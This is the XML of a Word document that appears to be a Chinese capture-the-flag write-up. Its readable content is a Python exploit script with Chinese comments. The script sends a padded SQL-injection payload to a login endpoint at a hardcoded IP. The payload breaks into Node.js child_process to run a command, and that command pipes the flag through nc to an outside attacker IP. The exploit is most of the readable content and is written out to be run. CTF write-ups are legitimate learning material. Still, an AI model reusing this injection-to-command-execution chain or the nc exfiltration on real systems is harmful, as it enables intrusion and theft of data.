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30E96BA6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0826ED7E" w:rsidR="00AF064E" w:rsidRDefault="001B495D" w:rsidP="00AF064E">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B495D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="001B495D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hooops</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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4CDB5BC2" w14:textId="681E0DB5" w:rsidR="001B495D" w:rsidRPr="00F66B02" w:rsidRDefault="00FB1716" w:rsidP="001B495D">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="006D7CD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="007A0D59" w:rsidRPr="007A0D59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这题我出不了了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A76CDE5" w14:textId="048FD9EE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02A8921E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 xml:space="preserve"># 从 random 模块导入 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E1764">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>randint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E1764">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 函数，用于生成随机整数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FA47C4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 xml:space="preserve">from random import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E1764">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>randint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="779FECE3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D4FCAA2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# 导入 requests 模块，用于发送 HTTP 请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091D8099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import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDB1598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2ED841E9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# 设置代理为空，即不使用代理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39654B61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po = {"http": None, "https": None}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E09A9DE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53C69D7D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# 定义一个 payload 字符串，其中包含了 SQL 注入和命令执行的恶意代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0594975C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payload = """','')/*%s*/returning(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009E1764">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1)as</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1764">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"\\'/*",(1)as"\\'*/-(a=`child_process`)/*",(2)as"\\'*/-(b=`/printFlag|nc 47.113.177.51 5555`)/*",(3)as"\\'*/-console.log(process.mainModule.require(a).exec(b))]=1//"--""" % (' ' * 1024 * 1024 * 16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307F5AD2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 xml:space="preserve"># 这个 payload 利用了 SQL 注入漏洞，试图在服务器上执行远程命令，通过 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E1764">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E1764">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 工具向攻击者的服务器发送数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CBFF2F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D098032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# 生成一个随机的用户名，用户名由三个随机整数拼接而成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0087DB01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 xml:space="preserve">username = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009E1764">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1764">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>randint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E1764">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(1, 65535)) + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E1764">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>randint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E1764">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(1, 65535)) + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E1764">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>randint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E1764">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(1, 65535))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E96ADC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73B56E49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# 定义要发送的数据，包含恶意的用户名和一个简单的密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1254CF59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data = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA3414D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 xml:space="preserve">    'username': username + payload, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440D1B1D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 xml:space="preserve">    'password': 'AAAAAA'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D5EFD7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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5EEFCF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422B6D5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# 打印 'ok' 表示程序运行到此处</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CCF308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print('ok')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9431BB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F4492C6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# 发送一个 POST 请求到指定的 URL，并携带 data 作为表单数据，同时设置代理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BF9D79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 xml:space="preserve">r = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009E1764">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>requests.post</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E1764">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1764">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'http://101.200.138.180:32031/login', data=data, proxies=po)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1608F690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70E7B05A" w14:textId="77777777" w:rsidR="009E1764" w:rsidRPr="009E1764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t># 打印服务器响应的内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0456E09A" w14:textId="036555D3" w:rsidR="001B4FE7" w:rsidRPr="001B4FE7" w:rsidRDefault="009E1764" w:rsidP="009E176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9E1764">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009E1764">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r.content</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1764">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001B4FE7" w:rsidRPr="001B4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06D78" w14:textId="77777777" w:rsidR="00615C97" w:rsidRDefault="00615C97" w:rsidP="00E37441">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="30BC5022" w14:textId="77777777" w:rsidR="00615C97" w:rsidRDefault="00615C97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69AA" w14:textId="77777777" w:rsidR="006B61FE" w:rsidRDefault="006B61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EF3B5" w14:textId="77777777" w:rsidR="006B61FE" w:rsidRDefault="006B61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774E" w14:textId="77777777" w:rsidR="006B61FE" w:rsidRDefault="006B6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03742" w14:textId="77777777" w:rsidR="00615C97" w:rsidRDefault="00615C97" w:rsidP="00E37441">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="410672CE" w14:textId="77777777" w:rsidR="00615C97" w:rsidRDefault="00615C97" w:rsidP="00E37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963A" w14:textId="77777777" w:rsidR="006B61FE" w:rsidRDefault="006B61FE" w:rsidP="006B61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A875" w14:textId="77777777" w:rsidR="006B61FE" w:rsidRDefault="006B61FE" w:rsidP="006B61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31FA" w14:textId="77777777" w:rsidR="006B61FE" w:rsidRDefault="006B61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30AE8"/>
    <w:rsid w:val="000477D2"/>
    <w:rsid w:val="00056427"/>
    <w:rsid w:val="0006176A"/>
    <w:rsid w:val="000C1C05"/>
    <w:rsid w:val="000F5B24"/>
    <w:rsid w:val="001043FF"/>
    <w:rsid w:val="00177EE1"/>
    <w:rsid w:val="001B495D"/>
    <w:rsid w:val="001B4FE7"/>
    <w:rsid w:val="001E0E9C"/>
    <w:rsid w:val="00213493"/>
    <w:rsid w:val="002676AF"/>
    <w:rsid w:val="002C17DC"/>
    <w:rsid w:val="002C2170"/>
    <w:rsid w:val="0032202F"/>
    <w:rsid w:val="00347E3D"/>
    <w:rsid w:val="0035409A"/>
    <w:rsid w:val="003A02DE"/>
    <w:rsid w:val="003D0756"/>
    <w:rsid w:val="003D31D4"/>
    <w:rsid w:val="00423F91"/>
    <w:rsid w:val="00485E9E"/>
    <w:rsid w:val="005314D4"/>
    <w:rsid w:val="00533F10"/>
    <w:rsid w:val="00555ADA"/>
    <w:rsid w:val="005B2FC8"/>
    <w:rsid w:val="005B53B5"/>
    <w:rsid w:val="0061096D"/>
    <w:rsid w:val="00615C97"/>
    <w:rsid w:val="00665256"/>
    <w:rsid w:val="00687AE0"/>
    <w:rsid w:val="006A5783"/>
    <w:rsid w:val="006B61FE"/>
    <w:rsid w:val="006D7CD7"/>
    <w:rsid w:val="0070400F"/>
    <w:rsid w:val="00713A2F"/>
    <w:rsid w:val="007510BD"/>
    <w:rsid w:val="007A0D59"/>
    <w:rsid w:val="00867590"/>
    <w:rsid w:val="008C3BB0"/>
    <w:rsid w:val="008D1FF7"/>
    <w:rsid w:val="009012EE"/>
    <w:rsid w:val="00983D21"/>
    <w:rsid w:val="009867AD"/>
    <w:rsid w:val="009A044C"/>
    <w:rsid w:val="009E1764"/>
    <w:rsid w:val="009E4A30"/>
    <w:rsid w:val="009F297D"/>
    <w:rsid w:val="00A6290B"/>
    <w:rsid w:val="00A91ABA"/>
    <w:rsid w:val="00AF064E"/>
    <w:rsid w:val="00B82A3B"/>
    <w:rsid w:val="00C346CE"/>
    <w:rsid w:val="00CC1E80"/>
    <w:rsid w:val="00CF4697"/>
    <w:rsid w:val="00D01E13"/>
    <w:rsid w:val="00E37441"/>
    <w:rsid w:val="00E50877"/>
    <w:rsid w:val="00E57A39"/>
    <w:rsid w:val="00EA3779"/>
    <w:rsid w:val="00EB4428"/>
    <w:rsid w:val="00EB697D"/>
    <w:rsid w:val="00EC5DB2"/>
    <w:rsid w:val="00F17250"/>
    <w:rsid w:val="00F46E63"/>
    <w:rsid w:val="00F5430B"/>
    <w:rsid w:val="00F66B02"/>
    <w:rsid w:val="00FB1716"/>
    <w:rsid w:val="00FC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  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001B4FE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4FE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E0E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E0E9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41</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-11T03:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-25T04:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>